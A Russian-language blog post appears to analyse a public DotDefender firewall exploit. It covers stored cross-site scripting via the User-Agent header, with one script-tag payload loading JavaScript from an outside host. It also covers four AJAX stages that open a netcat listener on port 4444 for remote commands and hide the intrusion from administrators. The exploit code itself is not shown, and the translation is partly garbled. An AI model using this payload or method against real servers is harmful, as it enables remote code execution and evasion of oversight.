Анализируя эксплоит

Анализируя эксплоит DotDefender

 

Глядя на эксплоит поближе мы видим, что необходимо сделать для того чтобы предотвратить DotDefender PoC в полный эксплоит.

 

Для работы этой атаки сначала вы должны войти в DotDefender залогиниться в нем, а затем просто просмотреть лог администратора в журнале DotDefender что вы создали. Это может быть сделано с какими-либо блоками DotDefender при помощи межсайтового скриптинга либо SQL-иньекции, просто изменив поле User-Agent для внедрения своего сценария, подобным образом:

 

<script language=»JavaScript» src=»http://MySite.com/DotDefender.js»></script>

 

Таким образом, это означает, что мы имеем две различные вещи, которые должны произойти в эксплоите. Во-первых, вызвать запись журнала в DotDefender с вредоносным User-Agent. Во-вторых, размещение файла JavaScript, что позволит выполнять команды на сервере.

 

Особенности JavaScript

 

1 этап

Это первый этап атаки. Что этот этап делает, создает запрос AJAX POST на страницу index.cgi с параметрами для удаления сервера из списка. Потому как мы выполняем этот сценарий при помощи AJAX и мы можем отправить параметры принадлежащие POST к индексной странице. Данный пример открывает netcat прослушивающий порт 4444. Единственное что должно быть изменено это название site.com, чтобы соответствовать сайту защищенному от DotDefender.

 

Мы можем видеть выделенный код эксплоита ниже, что в первом разделе, нам необходимо изменить netcat прослушивание и site.com к соответствующему имени сайта.

Код что надо изменить
Dante

 

Этап 2

Это второй этап атаки. DotDefender требует администратора ‘Refresh the Settings‘ (обновить настройки) на Web Application Firewall после чего сайт будет удален.

 

Из комментариев мы можем видеть, что после того как эксплоит окончен, PoC будет пытаться продолжать, не вызывая подозрение администратора DotDefender, скрывая следы.

Следующий этап эксплоита
Dante

 

Этап 3

Это третий этап атаки. Поскольку выполнение кода уязвимости требуется для того чтобы сайт был удален из DotDefender, теперь сайт должен быть обратно добавлен в список.

 

Мы видим в следующем коде мы должны изменить параметр ‘site.com‘ снова на соответствующее имя сайта.

Снова меняем код на нужный
Dante

 

Этап 4

Это четвертый и последний этап атаки. Сайт должен быть добавлен обратно в список, но администратор должен еще раз ‘Refresh the Settings‘ (Обновить настройки).

 

Это финальный этап нашего эксплоита и является копией этапа 2. Это также не имеет необходимости внесения модификаций.

Завершающий этап эксплоита
Dante

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *